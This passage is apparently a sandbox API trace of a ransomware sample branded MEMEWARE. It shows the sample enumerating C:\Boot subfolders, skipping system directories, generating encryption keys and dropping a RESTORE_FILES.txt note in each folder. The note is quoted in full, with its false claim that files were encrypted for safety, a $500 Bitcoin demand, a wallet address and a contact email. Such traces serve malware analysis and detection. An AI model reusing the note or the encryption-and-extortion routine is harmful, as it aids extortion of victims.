lpFindFileData=0x295f400) returned 0 [0044.590] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.590] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\RESTORE_FILES.txt") returned 35 [0044.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fonts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.689] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.689] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.690] lstrlenA (lpString="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") returned 684 [0044.690] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.690] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.690] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.690] CloseHandle (hObject=0xac) returned 1 [0044.690] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files (x86)") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0044.690] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0044.690] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0044.691] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0044.691] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0044.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.691] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.691] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0044.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.691] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.691] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.691] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.692] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.692] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0044.692] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.692] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0044.692] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.692] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.692] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.692] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.692] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\RESTORE_FILES.txt") returned 35 [0044.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fr-fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.692] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.693] lstrlenA (lpString="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") returned 684 [0044.693] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.693] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.693] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.693] CloseHandle (hObject=0xac) returned 1 [0044.693] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files (x86)") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0044.693] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0044.693] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0044.693] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0044.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.694] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0044.694] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.694] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.694] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0044.694] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.694] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0044.694] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.694] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.695] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.695] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\RESTORE_FILES.txt") returned 35 [0044.695] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\RESTORE_FILES.txt" (normalized: "c:\\boot\\hu-hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.695] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.695] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.696] lstrlenA (lpString="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") returned 684 [0044.696] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.696] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.696] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.696] CloseHandle (hObject=0xac) returned 1 [0044.696] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Program Files") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="Program Files (x86)") returned -1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0044.696] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0044.696] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0044.696] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0044.696] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0044.696] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0044.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.697] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.697] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.697] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.697] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0044.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.697] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.697] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.697] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.697] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0044.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.698] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.698] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0044.698] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.698] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.698] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.698] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.698] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\RESTORE_FILES.txt") returned 35 [0044.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\RESTORE_FILES.txt" (normalized: "c:\\boot\\it-it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.698] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.698] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.699] lstrlenA (lpString="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") returned 684 [0044.699] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.699] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.699] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.699] CloseHandle (hObject=0xac) returned 1 [0044.699] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files") returned -1 [0044.699] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0044.700] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0044.700] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0044.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.700] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0044.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.700] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.700] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.700] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0044.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.700] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.700] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.700] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0044.700] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 